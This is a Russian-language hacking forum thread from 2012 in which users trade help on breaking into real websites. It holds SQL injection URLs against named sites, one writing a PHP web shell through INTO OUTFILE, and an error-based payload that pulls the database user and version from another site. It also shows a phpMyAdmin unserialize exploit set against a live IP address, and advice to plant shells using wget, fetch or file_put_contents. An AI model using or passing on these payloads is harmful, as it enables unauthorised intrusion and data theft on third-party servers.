Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. skM

    skM New Member

    Joined:
    27 Jun 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    select from
     
  2. Dr.Strangelove

    Joined:
    1 Dec 2008
    Messages:
    111
    Likes Received:
    61
    Reputations:
    -6
    Code:
    http://www.ourkids.net/camp/camp-profile-agate.php?id=-710%27%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20%20into%20outfile%20%27/var/www/html/ourkids.net/images/shell.php%27%20%20--%20/*
    Друзья, кто поможет залиться? Суть проблемы: путь к директориям верный, но мускул выдает ошибку как-будто директории не существует (Errcode: 2), хотя директории реально существуют, и если нет прав на запись, то должна быть (Errcode: 13). Пробовал в разные директории. Результат один. Вообщем смотрите сам и все поймете.
     
    #20462 Dr.Strangelove, 26 May 2012
    Last edited: 26 May 2012
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    Сам сайт и бд находится на разных серверах.
     
    _________________________
    1 person likes this.
  4. slayzer

    slayzer New Member

    Joined:
    30 Apr 2009
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    инъекция в post запрос

    в таком виде a"");mysql_query("update xxx set login='22223' where login='2222'");
    выдает ошибку вида - "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update xxx set login='22223' where login='2222'");"' at line 1"

    а если так a"");mysql_query(update xxx set login='22223' where login='2222');
    то пост запрос выполняется, но айпейта не происходит.
    подскажите в чем трабл
     
  5. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    ребят,подскажите,плз...как скормить sqlmap'у блайнд-скулю типа этой (suffix .html)

    http://site.com/common/[sql-inj].html

    havij её норм берет,как http://site.com/common/%Inject_Here%.html

    и где можно почитать про suffix и prefix в скулях...искал в сети,ничего норм не нашел...? :rolleyes:

    Подскажите,пожалуйста ;)
     
  6. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    что делаю не так?
    Code:
    13+union+select+1,2,table_name,4,5,6,7,8,9,10+from+information_schema.tables+limit+39,1--
    Такой запрос выдает в один список всю базу information_schema и базу сайта.
    Собственно вопрос! Каким запросом посмотреть соседние базы если юзер имеет к ним доступ?
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    Попробуй в выводимое поле вставить такой шаблон:
    P.S: а вот и примерчик вставки такого блока.

     
    _________________________
    #20467 winstrool, 26 May 2012
    Last edited: 26 May 2012
    1 person likes this.
  8. dynda2000

    dynda2000 New Member

    Joined:
    16 Mar 2012
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Ребят помогите разобраться
    Есть phpmyadmin 2.11.2.2
    Нашел старый сплоит phpMyAdmin <= 2.11.9 unserialize() arbitrary PHP Code execution exploit
    настроил:
    $pma_setup_url = 'http://91.212.89.ххх/phpmyadmin/scripts/setup.php'; /*полный адрес скрипта установки phpMyAdmin*/
    $ftp_code = 'ftp://логин:пароль@dir.uz/shell.txt'; /*полный ftp-путь до файла с содержимым <? phpinfo();exit; ?>*/

    запустил https://127.0.0.1/phpmyadmin/exp.php он мне выдал phpinfo но наверху пишет что есть ошибка в 19 строке $query = $parsed_url['query'];

    Затем в шеле вместо <? phpinfo();exit; ?> подставлял "Antichat shell" и "R57Shell" вижу их дерикторию phpmyadmin с файлами с правами -rw-rw-rw- но ничего там не работает и начал ругаться еще и на это:

    Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\core.lib.php on line 558

    Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 75

    Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 76

    Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 77

    Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 78

    Warning: Cannot modify header information - headers already sent by (output started at C:\Program Files (x86)\VertrigoServ\Phpmyadmin\libraries\Config.class.php(377) : eval()'d code:850) in C:\Program Files (x86)\VertrigoServ\Phpmyadmin\scripts\setup.php on line 84

    Что делаю не так ?
     
    #20468 dynda2000, 26 May 2012
    Last edited: 26 May 2012
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    лей сразу непосредственно шелл
     
  10. dynda2000

    dynda2000 New Member

    Joined:
    16 Mar 2012
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Подскажи как это делается? если не затруднит
     
  11. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    В sqlmap поставьте * в том месте где уязвимость.
    Пример: http://site.com/common/*.html

    to dynda2000
    Почитайте про system(wget/fetch), там же сразу и file_put_contents() и выбирайте как Вам больше по душе!
     
    #20471 cat1vo, 26 May 2012
    Last edited: 26 May 2012
  12. абвгдешка

    Joined:
    2 May 2011
    Messages:
    48
    Likes Received:
    13
    Reputations:
    1
    w3af нашёл уязвимость (ocCommanding), первый раз с ней сталкиваюсь как с ней работать?
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Всем привет, вобщем такой вопрос
    есть скуля в пост запросе

    на страницу выводит три ошибки

    id=2'

    начинаю подбирать колонки

    на трёх
    id=2'+union+select+1,2,3--+
    выводит только одну ошибку
    mysql_fetch_array()

    и обычный текст страницы(прямого вывода на станицу нету), дальше перебераю и имею все теже три ошибки, собствено, дальше крутить нету смысла, как я дальше в таком случае могу получить какойю либо инфу из БД в таком случае?
     
  14. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    21
    Likes Received:
    7
    Reputations:
    0
    qaz, error based методом попробывать мб ?
     
  15. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ето не тот вывод об ошибке когда юзают error based
     
  16. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    никто не может помочь?)
     
    #20476 justonline, 27 May 2012
    Last edited: 27 May 2012
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    что на счет того чтоб перевести в урленкод?, или криптованую ссылку где не использауется двойные слеши? вариантов уйма, блескни умом, вопрос достаточно бонален воспользуйся гуглом!!!
     
    _________________________
  18. mr_zedox

    mr_zedox New Member

    Joined:
    30 Apr 2012
    Messages:
    25
    Likes Received:
    0
    Reputations:
    0
    Нашел XSS в post запросе, если я правильно понял то это активка, что через неё сделать можно, если есть полная свобода:
    +ни чего ни фильтруется
    +работают script src=lyaya.js
    и т.д.
     
  19. Vanzent

    Vanzent New Member

    Joined:
    12 Jun 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Как победить?

    PHP:
    tabu72.ru/catalog/93)+union+select+1+--+
    Выдает
    Code:
    user warning: You have an error in your SQL syntax; check the
    manual that corresponds to your MySQL server version for the right syntax to use near 'group by td.name' at line 9 query:
    catalog_taxonomy_select_brands /* Гость : 
    catalog_taxonomy_select_brands */ SELECT td.tid, td.name 
    FROM term_node tn left join term_node tnn on tn.nid = tnn.nid
     left join term_data td on td.tid = tnn.tid left join node n on tn.nid 
    = n.nid left join content_type_tovar tt on tn.nid = tt.nid WHERE 
    tn.tid in ( 93) union select 1 -- ) and tnn.tid not in ( 93) union 
    select 1 -- ) group by td.name in /var/www/sites/tabu72.ru/sites/
    all/modules/catalog/catalog.module on line 895.      user warning:
     The used SELECT statements have a different number of columns
     query: pager_query /* Гость : pager_query */ SELECT tn.nid, 
    td.name, td.tid FROM term_node tn left join term_node tnn on 
    tn.nid = tnn.nid left join term_data td on td.tid = tnn.tid left join 
    node n on tn.nid = n.nid left join content_type_tovar tt on tn.nid
     = tt.nid WHERE tn.tid in ( 93) union select 1 -- ) and tnn.tid not in 
    ( 93) union select 1 -- ) and IFNULL(tt.field_price_sale_value, 
    0)=0 and tt.field_dateupdate_value is NULL order by n.title asc 
    LIMIT 0, 12 in /var/www/sites/tabu72.ru/sites/all/modules/
    catalog/catalog.module on line 814.    
    Параметр используется во множественных запросах. Если добавить еще 1 колонку, то появятся еще 2 ошибки
     
    #20479 Vanzent, 28 May 2012
    Last edited: 28 May 2012
  20. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://tabu72.ru/catalog/93)or(select(1)from(select+count(0),concat((select(concat_ws(0x3b,user(),version()))),floor(rand(0)*2))from(term_node)+group+by+2)a)--+
     
    1 person likes this.
Thread Status:
Not open for further replies.